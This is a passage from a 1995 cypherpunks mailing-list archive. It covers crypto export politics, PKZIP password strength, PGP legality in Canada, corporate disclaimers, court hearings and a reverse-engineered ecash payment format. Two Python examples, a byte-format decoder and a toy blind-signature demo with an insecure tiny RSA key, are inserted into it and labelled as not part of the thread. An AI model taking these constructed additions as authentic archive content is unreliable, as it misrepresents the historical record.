Essentially there are always a whole series of civil service initiatives that continue from administration to administration that everybody knows are loser ideas but it is easier to continue with them than give the opposition an opportunity to claim that it was a retreat. It sounds (and is) a stupid way to do politics but that is the way it works. For some reason the American people consider stopping a bad policy to be a "flip-flop" and hence something which demonstrates the unfitness of the office holder, just as willingness to negotiate is "vacillation". It's not a new principle. Clinton axed a whole raft of programs that the Bush administration had realised were losers but had continued for the same reason. What you have to avoid here is making the issue one of party politics. First off you will lose because you will bet on the losing side at least half the time. Secondly policies that get into the party political arena end up being treated in an absolutist and ideological manner which prevents any common sense input. You are likely to find both sides taking positions you don't like simply because it is advantageous politically. Secondly you are likely to win the argument in the Congress and then lose it in the Whitehouse. The next administration will be either Dole or Clinton, more likely Clinton because Dole is a fossil and the next election will not be about the second world war or the cold war, it will be about responding to new technology. Neither Dole nor Clinton is likely to respond well to a mandate from congress concerning issues of national security. That is the card the FBI will play. The NSA have their own card but none of us know what their real concern is. What I am saying is that we must not allow the Congress to attempt to beat up the Whitehouse. They simply do not have leverage on this issue. No President will overrule the experts on a matter of National security lightly, if it is a partisan congressional mandate it will be much easier to reject. 
A much better strategy is to portray the FBI as being a rogue agency acting outside their brief. The debate must be turned from a simple question of privacy versus national security which you will lose regardless of which party is in power to one of economic security versus short term national security. You need to point out the economic cost of insecure communications. You have to bring to light the behaviour of the French for example. Make it clear that US companies are losing business because the French regularly tap fax communications. Make it clear that encryption is essential to provide high grade protection against hackers.

The privacy issue may be what drives cypherpunks but it is not the argument which will work in the arena you need to be heard in. They do not care about privacy, most particularly not protection against government intrusion. They are not even that concerned about protecting individuals' privacy against corporate abuse.

If you make it a party issue you will not only lose but risk turning the clock the other way. At the moment everyone knows that the export control laws are not stopping people from getting PGP. It is not a good idea to rub people's noses in it. It is easy to ignore export violations by turning a blind eye. It is difficult to turn a blind eye when people are so anxious to announce what is going on. Phil Z. is not having problems because he wrote PGP, he is having problems because he made sure the FBI couldn't pretend they did not know what was going on. If you make encryption a party issue then one of those Grassley bills will pass and the President in power may not veto it.

Phill

From dekel at carmel.haifa.ac.il Wed Nov 22 17:51:58 1995
From: dekel at carmel.haifa.ac.il (L. DEkel)
Date: Thu, 23 Nov 1995 09:51:58 +0800
Subject: PKZIP - Encryption
Message-ID:

PKZIP Encryption - Practical approach
=====================================

Note: I am discussing PKZIP ver.
2.xx encryption, but the abstract isn't about a particular encryption.

ABSTRACT:

Practical security often differs from Theoretical security. If I asked you, would you make the effort of renting a box at the bank's safe for putting only $1 inside, then when you want it you'll have to drive to town, at opening hours, and be escorted by an armed guard to the safe, just to get the $1, I can guess what your answer will be. The same thing goes for Cryptography. What you are trying to protect, its importance, price, value, determines the steps you would be willing to take to ensure a safe and strong encryption. If you want to hide a game from your kid brother, you can use some basic algorithm of encryption (say XOR), but say you want to hide proofs that you killed someone you better use a stronger algorithm (say IDEA).

To conclude: The system you should choose for security depends on:

1. How sensitive is the data you want to hide.
2. Who is the potential cracker of your system.
3. How convenient is the Crypto system for use. (*)

(*) This is not so trivial, as security = 1/convenience, you can, for example force users to change their passwords every 2 min. very secure, but that's not very Practical.

PKZIP Encryption:

PKZIP encryption is often said to be: Weak, "a joke", "a deception" etc. Maybe it's time to put things in the right perspective. One must realize (yet again) the difference between: Theoretical Cryptography - and - Practical Cryptography:

From the Theoretical side, there is an excellent article: "A Known Plaintext Attack on the PKZIP Stream Cipher", by Eli Biham and Paul C. Kocher, that proposes an attack on the algorithm using known plaintext method. The writers come to the conclusion that: "The PKZIP cipher is weak, and should not be used to protect valuable data".

Criticism:

0). Only you can define what is "valuable data" for yourself, this could be an abstract question. [see above ABSTRACT discussion]

1).
The proposed attack is largely Theoretical, in "laboratory conditions", whereas a ciphertext-only attack, more like what we often find in the real world, is Harder. The article doesn't propose any effective ciphertext-only attack. (It seems the writers only tried to give a general assessment of the algorithm strength, which they did very well).

Note: A Very limited Known-plaintext attack is possible against PKZIP, as specific information about the Header of the archive file is Known, but this attack is of complexity 2^38 or higher, so it's not very effective, however it is possible for an expert Cryptanalyst. (This is still Easier than ciphertext-only attack - we meet in the street).

Thus, the theoretical attack is good in telling us about the encryption algorithm, its strength and weaknesses, and knowledge is always better than ignorance, But, in real world, such an attack can be rendered ineffective, or impractical in terms of resources consumed, time spent, money etc.

Don't get the wrong impression, in general, Cryptographic research is Good, it helps determine the overall strength of an algorithm, make suggestions as to possible improvements, warn against weak keys, back-doors etc. But we must separate the Practical from the Theoretical, and it works both ways too. A one-time-pad (OTP) for example, is considered theoretically unbreakable, but in practice OTP systems have been broken more than once, as long as there are people making Human mistakes: losing secret keys, encrypting a message with the OTP more than once, etc.

So: Theoretical encryption strength != Practical encryption Strength

2).
Considering the "many" cracking utilities in the market: there is almost NO ready made software that really cracks the PKZIP algorithm (crack = cryptanalysis, that is Really analyzing the algorithm, not guessing games), in fact there is No software that can really crack Any modern algorithm such as DES, IDEA etc, That is except maybe CBW which is the closest thing to Really cracking the crypt(1) for unix, or some commercial products for cracking WordPerfect encryption or so. (The strength of PKZIP 1.xx/2.xx encryption is much greater than the above crypt(1) and WordPerfect).

All the "Great" utilities are just fancy password guessers at best, none of them analyze the ciphertext. True, some of them are good guessers, but their "strength" depends on the Weakness of the password (password = The cryptographic Key). The stronger the password the less chance the "cracker-util" will crack it.

The best crackers in the market perform a "limited" brute force attack, if they are good. "limited" is referred to "dictionary attacks", such as the cracker doesn't perform a complete Keyspace (brute-force) search, instead it performs a "Subset keyspace search", i.e. choosing some elements of the Keyspace (say english words) and trying them. (There is the option, in some crackers, including crackers for PKZIP, such as FZC, to perform a more "ordered" Keyspace, that is checking sequences of Keys, e.g: All-5-uppercase letters only- keys).

The conclusion from this section is, that if you choose a Long enough, Hard to find (say random chars) password such as "x at J60!fv_Zd4%", then you are quite safe from these "horrid" crackers. That last statement is good for choosing passwords in general.

Final note: PKZIP is not a crypto system it's an Archiver with a password protection option. If You want to protect your secret cherry cake recipe from your mother, you can safely use PKZIP protection (assuming your mother isn't a top cryptographer working for NSA).
If you want to hide the formula for Cold fusion - use PGP. And remember, there is always the "rubber hose" cryptography option.

,,,,, DEkel '''''

From karlton at netscape.com Wed Nov 22 17:53:38 1995
From: karlton at netscape.com (Phil Karlton)
Date: Thu, 23 Nov 1995 09:53:38 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <199511221048.CAA26409@jobe.shell.portal.com>
Message-ID: <30B3CE64.6BF2@netscape.com>

Alice (or someone representing themselves as Alice) said:

> What I'm trying to say is that if someone posts from watson.ibm.com,
> and IF they are talking about OS/2, we will not accept that they are
> not speaking independently of the knowledge they have garnered from
> watson. And that is understandable.

> In the same way, someone who writes from Netscape.com or AT&T, or Sun
> and tries to disclaim that they are speaking for the company, when
> they step out as an employee of a company is deluding themselves.

This is a complete non sequitur. See if you can follow this: only those authorized by the company to speak for the company are authorized to speak for the company. There is a genuine difference between a corporate officer saying

    The Amalgamated Widget corporate policy on strong crypto is ...

and some engineer from Amalgamated Widget saying

    My private opinion on strong crypto is ...

The consequence of every statement by every employee being taken as company policy is that every employee (except for public relations) will be prohibited from contributing to any public forum or even answering apparently innocuous questions on the net. This would not be a desirable outcome.

Still speaking for myself,

PK
--
Philip L.
Karlton karlton at netscape.com
Principal Curmudgeon http://www.netscape.com/people/karlton
Netscape Communications

From s1113645 at tesla.cc.uottawa.ca Wed Nov 22 17:54:58 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Thu, 23 Nov 1995 09:54:58 +0800
Subject: PGP in Canada
In-Reply-To: <9511221544.ZM6977@glacius.alias.com>
Message-ID:

On Wed, 22 Nov 1995, Richard Martin wrote:

> It is legal for a Canadian citizen to import PGP into Canada
> under Canadian law. It is legal to use either the international
> or yanqui versions in Canada--software patents don't apply [I
> don't think].

Yup. RSA's only patented in one country- the USA. Though maybe with NAFTA...?

> It is *illegal* for a Canadian to export pgp anywhere except the
> U.S., if the pgp came from the U.S. and no substantial changes
> have been made to it.

All the same if it was freeware crypto software and completely written outside the US, I'm under the understanding that you can export without a license. IANAL, I may be wrong. Do double check. Do mail the export controls division of external affairs and ask for "Canada's Export Controls", the "General Software Note" and a specific opinion regarding the exportability of pgp, US crypto, non-US crypto and freeware vs. commercial wares. They also hadn't made up their mind as to whether ftp constituted export. They have branches in all major Canadian cities, so I'll mail the nearest addresses to those who are interested (I'm not at home right now).

> My recommendation: get the international version of PGP. [Unless, of
> course, the above statements are wrong, in which case my reasoning
> in favour of the international version are faulty.]

Sorry to say, it would be pointless, you wouldn't be able to export it from here unless it was totally rewritten outside the US (which I take it it isn't, right?)
From jya at pipeline.com Wed Nov 22 18:14:21 1995 From: jya at pipeline.com (John Young) Date: Thu, 23 Nov 1995 10:14:21 +0800 Subject: The Mesh and the Net Message-ID: <199511230141.UAA02365@pipe4.nyc.pipeline.com> SciAm's December article on future high-tech carnage cites: "The Mesh and the Net: Speculations on Armed Conflict in a Time of Free Silicon," by Martin C. Libicki, March, 1994. (233kb) Available on the Web at: NDU is the National Defense University, Libicki's teat. He is quoted: "We're getting a lot of clever ideas about how to fight a Gulf War more efficiently, but we rarely get anything about how to fight a Vietnam more efficiently." Here are excerpts from his preface: Mesh -- the term applied to military applications -- points to the holes; as information technology places a finer mesh atop the battlefield, more objects are caught in it. Net -- the term applied to civilian applications -- points to the substance of the system; the connectivity of people and their machines suggests new patterns of social relationships and new venues for conflict. Silicon, that which is to become free, stands for both semiconductor chips (for computation) and optical fibers (for communications). Argument: The relationship of the once and future revolution in information technology to warfare is analyzed in several steps: * Chapter One outlines the basis for this revolution and explains why its most natural expression is the dispersion rather than accumulation of information power. * Chapter Two examines its expression on the battlefield in three aspects: Pop-up warfare, the rise of the Mesh, and the evolution of Fire-ant warfare. * Chapter Three examines whether the revolution on the battlefield translates into a commensurate revolution in military organization. * Chapter Four discusses implications for acquisition, research and development. * Chapter Five extends the analysis to the case of low-intensity conflict. 
* Chapter Six attempts a broader assessment of how civilian applications of information technology, the Net, may affect national security.
* Chapter Seven contrasts the Mesh, and the Net.
* The Epilogue considers certain reasons why information technology may not translate into the victory of the Small and the Many over the Few and the Large.

-----

and links offer an ape-lab of global insecurity ebolas.

From x93ojg at juliet.stfx.ca Wed Nov 22 18:17:46 1995
From: x93ojg at juliet.stfx.ca (Still)
Date: Thu, 23 Nov 1995 10:17:46 +0800
Subject: PGP in Canada
In-Reply-To:
Message-ID:

I think people may have misunderstood me. I am able to get PGP, I just want to know if it is legal for me to do so as I want to install it on a network and am not a big fan of jail. It would do serious things to my future in the Canadian military. All I want to know quite simply is "Is it legal for me to ftp a copy of PGP?" The MIT site says that it is OK as long as I am exporting it to Canada for use on a machine in Canada. Although other sites say that it is not permitted to be exported to Canada.

--
T H E M A N , T H E M Y T H , T H E L E G E N D .
******************************************************************************
* Dylan "Still" Boudreau * Knowledge is proud that she knows so much; *
* Internet: x93ojg at stfx.ca * Wisdom is humble that she knows no more. *
******************************************************************************
* Homepage: http://juliet.stfx.ca/people/stu/x93ojg/welcome.html *
******************************************************************************
When someone says, "That's a good question." You can be sure it's a lot better than the answer you're going to get.
From iagoldbe at calum.csclub.uwaterloo.ca Wed Nov 22 18:23:39 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 23 Nov 1995 10:23:39 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <490jct$11k@calum.csclub.uwaterloo.ca>

In article <199511230103.RAA15911 at jobe.shell.portal.com>, Hal wrote:
>Ian Goldberg writes:
>
>>Last week, I was taking a look at the ecash protocol (no, I don't have a copy;
>>I have a binary, which I can't even run...).
>
>>I've managed to decipher a useful bit of the first message sent from
>>the shop to the payer. It's the Payment Request, and contains the following
>>information:
>
>>o Header identifying packet as Payment Request
>>o The integer 4
>>o The payment amount, in cents
>>o The time (seconds since 1970)
>>o The integer 79
>>o The name of the shop (payee)
>>o A description of the item being paid for
>>o An empty string
>>o The integer 0
>>o End of Record marker
>
>That's very interesting work! What are the string formats, are they null
>terminated or Pascal-style with a preceding count byte? How did you
>identify "an empty string", wouldn't that just be a byte of 0? How did
>you know it was an empty string rather than just a 0.

See below.

>Did you get this by inducing a shop to send a payment request message to
>some program you wrote which was listening on the ecash port?

Yup. I just had a program sitting on the ecash port that hexdumped anything fed to it. That, and a copy of the binary to read...

>I wonder if it would be legal to write shop software which sent such a
>payment request, took the resulting coins, and deposited them in the bank
>(if we could figure out all the protocols necessary). This particular
>sequence of operations would not appear to infringe anybody's patents -
>there are no blinding operations involved. It's not clear how useful
>such a program would be but at least it would be one step away from the
>DigiCash monopoly.
From what I gathered from Doug's posts a little while back, the _client_ stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.

Here are the messy byte-details:

The data encoding:

---
Header: 2 bytes
    0xa0 0x80+type
    where type is:
        0x12: Payment Request
        0x0a: Payment
        0x29: Length of Message
        0x13: Dummy Message
        (there are others)
---
EOR: 1 byte
    0xa1
    End of Record indicator
---
n-byte Integer:
    0x90 0x80+n followed by n bytes of data, MSB first
    n should probably be 1 <= n <= 4.
---
Date: 4 bytes
    0x91 0x84 followed by 4 bytes of time since 1970
---
String:
    0x92 0x80+(length) followed by (length) bytes
---
Data:
    0x94 0x80+(length) followed by (length) bytes
---

There are other types, like 0x93 (Multi-precision integer) that I haven't decoded yet.

=====

The first message from the shop:

a0b9 9083 0000 37a1                      # ......7.
a092 9081 0490 810a 9184 30ad 1930 9081  # ..........0..0..
4f92 8c65 7368 6f70 4063 322e 6f72 6792  # O..eshop@c2.org.
9063 6769 2d62 696e 2f64 6f72 656d 6169  # .cgi-bin/doremai
6c92 8090 8100 a1                        # l......

What it means:

a0b9: Header (Message length)
9083 000037: integer = 0x37 (length of following message)
a1: EOR
a092: Header (Payment Request)
9081 04: integer = 4
9081 0a: integer = 10 (cost in cents)
9184 30ad1930: time
9081 4f: integer = 79
928c "eshop@c2.org" : string (payee)
9290 "cgi-bin/doremail" : string (description)
9280 : empty string
9081 00: integer = 0
a1: EOR

- Ian

From adam at lighthouse.homeport.org Thu Nov 23 08:54:47 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Fri, 24 Nov 1995 00:54:47 +0800
Subject: MED_vac
In-Reply-To: <199511222108.QAA10547@universe.digex.net>
Message-ID: <199511231641.LAA07272@homeport.org>

Scott Brickner wrote:
| "Thomas M. Swiss" writes:
| > A (possibly stupid) thought: could commercial key escrow help here?
| > | > I very much want hospitals to have fast access to my medical data if | >my broken and bleeding body should come through their door, even if I am | >unconscious and my personal physician cannot be reached. On the other hand, | >I don't want anyone to be snooping through them right now. | | Actually, Bell Labs outlines a system which can preserve anonymity | under these circumstances in "The Use of Communications Networks to | Increase Personal Privacy In a Health Insurance Architecture" at | . | | It's based on their anonymous credit card protocol, which is really a | sort of identity escrow service managed by a remailer. You might find | it interesting. Maximchuck's anon credit card system depends to a huge degree on fast, highly available remailers, but he makes no provisions for funding them. He suggested at a talk I attended that the Federal Reserve could operate the one remailer that his system would use to protect your privacy. Other than that, its an interesting system which uses no public key crypto for mostly anonymous transactions. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From lharrison at mhv.net Thu Nov 23 08:58:36 1995 From: lharrison at mhv.net (Lynne L. Harrison) Date: Fri, 24 Nov 1995 00:58:36 +0800 Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test) Message-ID: <9511231639.AA25523@mhv.net> >I am inclined to agree with Perry in as much as the volume of posts to >the cypherpunks list is greatly increased by reposts of news from >other mailing lists, USENET newsgroups, WWW sources, newspapers, TV >programs, films, books, talks, etc. While some of the information >posted is interesting, and relevant, some others are less relevant, >bordering on noise. > >The proposal: a separate list for current-event reports/news/reposts. 1. Creating a separate list, IMHO, will not stop cross-posts to the list. People will merely add one more list to their "cc" line. 2. 
More importantly, I am troubled with the "this is OUR list" attitude that some people have expressed. Yes, it is a pain when there are cross-posts that are completely off-topic but, as Adam correctly points out, some are interesting and relevant. One of the tenets proposed by those on this list is free speech. Most of us are on more than one list, so I'm assuming that most of us receive 100+ messages a day. It is irritating to read something that's been crossed to c|punks that has nothing to do with this list. However, it only takes a few seconds to arrive at that conclusion and trash the post. The "they are targeting this list" borders almost on paranoia. While some paranoia is healthy :) - it should not lead to the cry to ban posts that have been *deemed* to be inappropriate.

I find it interesting that those who express that the net should be a community where expression is to be encouraged and defended - until the time arrives when such "unsolicited/unwanted/offensive/irrelevant" expression knocks on one's front door.

Regards -
Lynne

*******************************************************
Lynne L. Harrison, Esq. | "The key to life:
Poughkeepsie, New York  |  - Get up;
E-mail:                 |  - Survive;
lharrison at mhv.net    |  - Go to bed."
*******************************************************

From perry at piermont.com Thu Nov 23 09:56:42 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 24 Nov 1995 01:56:42 +0800
Subject: Applied Crypto 2nd Ed.
Message-ID: <199511231725.MAA24475@jekyll.piermont.com>

I'm surprised no one has been giving their review of Applied Cryptography, 2nd. Ed., AKA The Bible. I have little time for a formal review -- my copy, purchased directly from Bruce (I encourage people to buy straight from him -- he deserves to get the cash!) only arrived a couple of days ago. It's an amazing piece of work. He's outdone the 1st Edition by a large stretch, which I wouldn't have thought possible.
I've bought the hardcover -- I'll be opening it up over and over again, I figure...

Perry

From gnu at toad.com Thu Nov 23 10:13:02 1995
From: gnu at toad.com (John Gilmore)
Date: Fri, 24 Nov 1995 02:13:02 +0800
Subject: Two 'punky court hearings: Dec 6th, SF and San Jose
Message-ID: <9511231746.AA16675@toad.com>

At 9AM on December 6 in San Francisco, the 9th District Court of Appeals will finally hear the appeal of my original FOIA case against NSA.

At 10AM on December 6 in San Jose, Roger Schlafly's case against RSA Data Security will hold a hearing on the validity of the Diffie-Hellman, Hellman-Merkle, RSA, and Schnorr patents.

Mark your calendar!

My hearing is the first (and probably only) oral arguments to the Court of Appeals. The overall issue is whether NSA is violating the law by deliberately taking six months to three years to handle ordinary FOIA requests. (And what can/will the courts do about it.) The specific issue that we appealed on is whether the lower-court judge in the case has the discretion to throw out a case in which the government is violating the law, without addressing the problem. The legal theory is that since the courts are peoples' only recourse when the government violates its own laws, the court system can't simply ignore the problem. This would mean that the people have NO recourse against a despotic government (except armed or nonviolent rebellion, which is a terrible solution).

There are lots of other ramifications, since NSA has built up a formidable wall of nit-picky procedural defenses. Since the judges will steer the oral hearing, I don't know whether they'll focus on the big issue or the gritty details. I'll work on getting some of the briefs online.

This case (CA No. 94-16165) is NOT at the Federal Building; the Court of Appeals is at 121 Spear Street (2 Rincon Center), 4th Floor, Courtroom 2, 9AM. I think Rincon Center is the old Post Office at Mission and Spear Streets.
Spear is "0th Street", downtown between the Bay and 1st Street. It probably won't be as much fun as the Bernstein hearings. But if we win (here and in a few other hearings), it could pry NSA open to public accountability. And this would go a long way toward making some real progress in the crypto policy debate. We might actually get to see the other side's concerns! If you come, wear a "good clothes" costume. If I wasn't going to be at my own hearing, I'd be at Roger's. He has sued RSA and PKP in the hope of overturning their patents, which they have been wielding like a club over anyone trying to make progress in public-key cryptography. (RSA's idea of reasonable and non-discriminatory licensing is "How much money do you have?"). Though some companies have disputed RSA's patents, nobody has ever made a court determine whether the patents are really valid. Roger aims to fill that gap. You may even get to see Jim Bidzos ooze through the courtroom. In an earlier hearing in the Schlafly case, Jim claimed that Roger had insufficient honesty and character because he had held a joint talk with *me* at Crypto '94 about our respective lawsuits. Jim described me to the court as an avowed destroyer of intellectual property rights, and strongly implied that I had unlawfully revealed their valuable RC4 trade secret. It ain't so, on any level, and if he says something like it again, I want lots of witnesses. 10AM, San Jose federal court, Judge Williams' courtroom. I hope Roger will post more details, access info for the legal documents in the case, and directions to the building. John Gilmore From mtwain at netcom.com Thu Nov 23 10:21:40 1995 From: mtwain at netcom.com (Mark Twain Ecash Support) Date: Fri, 24 Nov 1995 02:21:40 +0800 Subject: ecash protocol: Part 1 Message-ID: <199511231755.JAA02492@netcom15.netcom.com> > I know ecash has some proxy support > but I'm not sure how it works. There are SOCKS proxies and http proxies, > and I don't know which it uses. 
I used a logging httpd proxy to derive > the data for the SSL challenges I did this past summer. It might be > interesting to post the binary data from some ecash transactions. The Ecash firewall support works by sending the messages as multipart MIME messages. The browser is then set to hand the application/ecash message the Ecash front end. > I wonder if it would be legal to write shop software which sent such a > payment request, took the resulting coins, and deposited them in the bank > (if we could figure out all the protocols necessary). IANAL. What would you hope to gain from creating such a piece of software? --Lucky at -- Mark Twain Ecash Support From iagoldbe at calum.csclub.uwaterloo.ca Thu Nov 23 10:40:39 1995 From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg) Date: Fri, 24 Nov 1995 02:40:39 +0800 Subject: ecash protocol: Part 1 In-Reply-To: Message-ID: <492e1i$smd@calum.csclub.uwaterloo.ca> In article , Douglas Barnes wrote: > >> From what I gathered from Doug's posts a little while back, the _client_ >>stuff is perfectly fine; only the _bank_ stuff is Chaum-patented. >> > >This is exactly backwards. Also, it is entirely possible that they >have structured the protocol to make sure that both sides have to >practice some element of Digicash intellectual property. What I >said was "it is possible to create an anonymous digital cash system >where the bank does not infringe and the client can optionally >infringe or not infringe (sacrificing anonymity)." > >(See: http://www.communities.com/paper/agnostic.html) > > Yes. D'oh. I realized this while talking to Dave shortly after I posted. All the bank does is send back the cube root of what it received from the client. If the client wants to multiply by the cube of a random number before sending to the bank, and dividing by that random number after, that's up to it. 
The system Hal mentioned, though (client sends payment requests, receives payments, deposits them), still doesn't infringe, as long as it doesn't do _withdrawals_.

- Ian "Hoping he hasn't goofed up again..."

From perry at piermont.com Thu Nov 23 11:01:43 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Fri, 24 Nov 1995 03:01:43 +0800
Subject: crypto for porno users
In-Reply-To: <199511230817.AAA22826@you.got.net>
Message-ID: <199511231839.NAA24795@jekyll.piermont.com>

Jay Campbell writes:
> A common way to get around prostitution sting operations is to ask the lady
> to expose sensitive portions of her anatomy to prove her sincerity before
> the would-be customer commits to any transactions; this sort of thing is
> also becoming commonplace on the net for pornography or pirated software,
> too.

Except that government agents have mailed people kiddie porn as parts of stings. I wonder if decoy cops will expose themselves, too. All these urban myths about undercover police are amusing but quite useless. Yes, cops can lie about if they are cops. Yes, they can do all sorts of things.

Perry

From iagoldbe at calum.csclub.uwaterloo.ca Thu Nov 23 11:04:26 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 24 Nov 1995 03:04:26 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <199511231755.JAA02492@netcom15.netcom.com>
Message-ID: <492fha$1um@calum.csclub.uwaterloo.ca>

In article <199511231755.JAA02492 at netcom15.netcom.com>, Mark Twain Ecash Support wrote:
>> I wonder if it would be legal to write shop software which sent such a
>> payment request, took the resulting coins, and deposited them in the bank
>> (if we could figure out all the protocols necessary).
>
>IANAL. What would you hope to gain from creating such a piece of
>software?
>

A piece of ecash software which does not violate Chaumian patents, does something useful, and for which we have _source_...

- Ian "Speaking of which..."
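Added example, not part of any message in this thread and not DigiCash code: a decoder for the tag/length/value byte layout given in Ian Goldberg's earlier "ecash protocol: Part 1" post, run on the hex dump from that post. All function and field names are assumptions. Under the stated 0x80+type rule the dump's first header byte 0xb9 decodes to 0x39, not the 0x29 the table lists for Length of Message, so the decoder reports the wire value and leaves it unnamed.

```python
from datetime import datetime, timezone

# Record types exactly as listed in the post's table (it notes there are others).
RECORD_TYPES = {0x12: "Payment Request", 0x0A: "Payment",
                0x29: "Length of Message", 0x13: "Dummy Message"}

# The hex dump from the post with its ASCII column removed.
SAMPLE = bytes.fromhex("".join("""
    a0b9 9083 0000 37a1
    a092 9081 0490 810a 9184 30ad 1930 9081
    4f92 8c65 7368 6f70 4063 322e 6f72 6792
    9063 6769 2d62 696e 2f64 6f72 656d 6169
    6c92 8090 8100 a1
""".split()))

class DecodeError(ValueError):
    """Input does not follow the layout described in the post."""

def _take(buf, pos, n):
    """Return n bytes starting at pos, refusing to read past the end."""
    if pos + n > len(buf):
        raise DecodeError(f"truncated: need {n} byte(s) at offset {pos}")
    return buf[pos:pos + n], pos + n

def _flagged(buf, pos):
    """Read a 0x80+value byte (used for both record type and field length)."""
    raw, pos = _take(buf, pos, 1)
    if not raw[0] & 0x80:
        # How values above 0x7f are encoded is not described, so reject.
        raise DecodeError(f"byte {raw[0]:#04x} at offset {pos - 1} lacks 0x80")
    return raw[0] & 0x7F, pos

def parse_record(buf, pos=0):
    """Parse one record from its 0xa0 header to its 0xa1 EOR marker."""
    start = pos
    tag, pos = _take(buf, pos, 1)
    if tag[0] != 0xA0:
        raise DecodeError(f"expected header 0xa0 at offset {start}")
    rtype, pos = _flagged(buf, pos)
    fields = []
    while True:
        tag, pos = _take(buf, pos, 1)
        if tag[0] == 0xA1:                      # End of Record
            break
        if tag[0] not in (0x90, 0x91, 0x92, 0x94):
            # 0x93 (multi-precision integer) and others were not decoded.
            raise DecodeError(f"unsupported tag {tag[0]:#04x} at {pos - 1}")
        n, pos = _flagged(buf, pos)
        value, pos = _take(buf, pos, n)
        if tag[0] == 0x90:                      # integer, MSB first
            if not 1 <= n <= 4:                 # the post's guess at the range
                raise DecodeError(f"integer of {n} bytes")
            fields.append(("int", int.from_bytes(value, "big")))
        elif tag[0] == 0x91:                    # seconds since 1970
            if n != 4:
                raise DecodeError(f"date of {n} bytes")
            fields.append(("date", int.from_bytes(value, "big")))
        elif tag[0] == 0x92:
            fields.append(("string", value.decode("latin-1")))
        else:
            fields.append(("data", bytes(value)))
    name = RECORD_TYPES.get(rtype, "unlisted")
    return {"type": rtype, "name": name, "fields": fields,
            "size": pos - start}, pos

def parse_stream(buf):
    """Parse back-to-back records until the buffer is exhausted."""
    records, pos = [], 0
    while pos < len(buf):
        record, pos = parse_record(buf, pos)
        records.append(record)
    return records

def length_prefix_ok(prefix, body):
    """True when the prefix record's single integer equals the body's size."""
    return prefix["fields"] == [("int", body["size"])]

# Field names are assumptions; the order is the one the post lists.
REQUEST_LAYOUT = [("int", "const_a"), ("int", "amount_cents"), ("date", "time"),
                  ("int", "const_b"), ("string", "payee"),
                  ("string", "description"), ("string", "unused"),
                  ("int", "const_c")]

def payment_request(record):
    """Label a Payment Request's fields, rejecting any other shape."""
    kinds = [kind for kind, _ in record["fields"]]
    if record["type"] != 0x12 or kinds != [k for k, _ in REQUEST_LAYOUT]:
        raise DecodeError("not a Payment Request in the posted layout")
    out = {name: value for (_, name), (_, value)
           in zip(REQUEST_LAYOUT, record["fields"])}
    out["time"] = datetime.fromtimestamp(out["time"], timezone.utc).isoformat()
    return out

if __name__ == "__main__":
    prefix, request = parse_stream(SAMPLE)
    print(length_prefix_ok(prefix, request), payment_request(request))
```
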
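Added example, not part of the thread and not DigiCash code: the arithmetic Ian describes earlier in this thread, where the bank only returns a cube root and the client may multiply by the cube of a random number beforehand and divide by that number afterwards. The toy modulus, the SHA-256 coin encoding and every function name are assumptions.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA key for the bank (assumption: real keys are far larger). Both primes
# are 2 mod 3, so 3 is invertible modulo (P-1)(Q-1) and cube roots are unique.
P, Q = 65537, 104729
N = P * Q
E = 3
D = pow(E, -1, (P - 1) * (Q - 1))   # known only to the bank


def coin_value(serial: bytes) -> int:
    """Map a coin serial to a number mod N (SHA-256 is an assumed stand-in;
    the thread does not describe how ecash formats a coin)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def bank_cube_root(x: int) -> int:
    """Everything the bank does: return the cube root mod N of what it got."""
    return pow(x, D, N)


def blind(m: int, r: int = 0):
    """Client: multiply by the cube of a random r that is invertible mod N."""
    while r < 2 or gcd(r, N) != 1:
        r = secrets.randbelow(N)
    return (m * pow(r, E, N)) % N, r


def unblind(signed: int, r: int) -> int:
    """Client: divide the bank's answer by r."""
    return (signed * pow(r, -1, N)) % N


def verify(m: int, sig: int) -> bool:
    """Anyone can check a coin: cubing the signature must give the value back."""
    return pow(sig, E, N) == m % N


def withdraw(serial: bytes, r: int = 0):
    """One withdrawal; returns (what the bank saw, the finished signature)."""
    m = coin_value(serial)
    blinded, r = blind(m, r)
    return blinded, unblind(bank_cube_root(blinded), r)


if __name__ == "__main__":
    serial = b"constructed-serial-0001"      # constructed sample value
    seen, sig = withdraw(serial)
    print("bank saw", seen, "coin value", coin_value(serial),
          "signature valid:", verify(coin_value(serial), sig))
```

The bank's view (`seen`) changes with every blinding factor while the finished signature is the same one the bank would have produced on the unblinded value, which is why a client that skips the blinding step still gets a usable coin but gives up anonymity.
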
From dlv at bwalk.dm.com Thu Nov 23 11:47:47 1995
From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 24 Nov 1995 03:47:47 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <9511231357.AA10766@all.net>
Message-ID:

fc at all.net (Dr. Frederick B. Cohen) writes:
> This is not correct, at least according to legal precedent. If someone who
> is from Sun represents themselves as being from Sun (i.e., a Sun.Com email
> address in their signature line), then when they speak (or email) about Sun,
> its products, its policies, etc., they represent Sun.

Yes. On the positive side, the readers are likely to take more seriously someone who's known to work for the company whose products he's discussing. E.g., if someone writes from Netcom about Java, and I happen to know that he works for Sun (even in a totally unrelated division), I'll suspect that he may know more about Sun products than someone whose affiliation I don't know, and I'll pay a little more attention to his writings.

The periodic Usenet post _What is Usenet? A second opinion_ by Edward Vielmetti says:

]- Disclaimers are worthless. If you post from foobar.com, and put a note
] on the bottom "not the opinions of foobar inc.,", you may satisfy the
] lawyers but your corporate reputation still will be affected. To maintain
] a separate net.identity, post from a different site.

I agree that disclaimers are worthless. I don't agree that they would satisfy the lawyers.

---
Dr. Dimitri Vulis
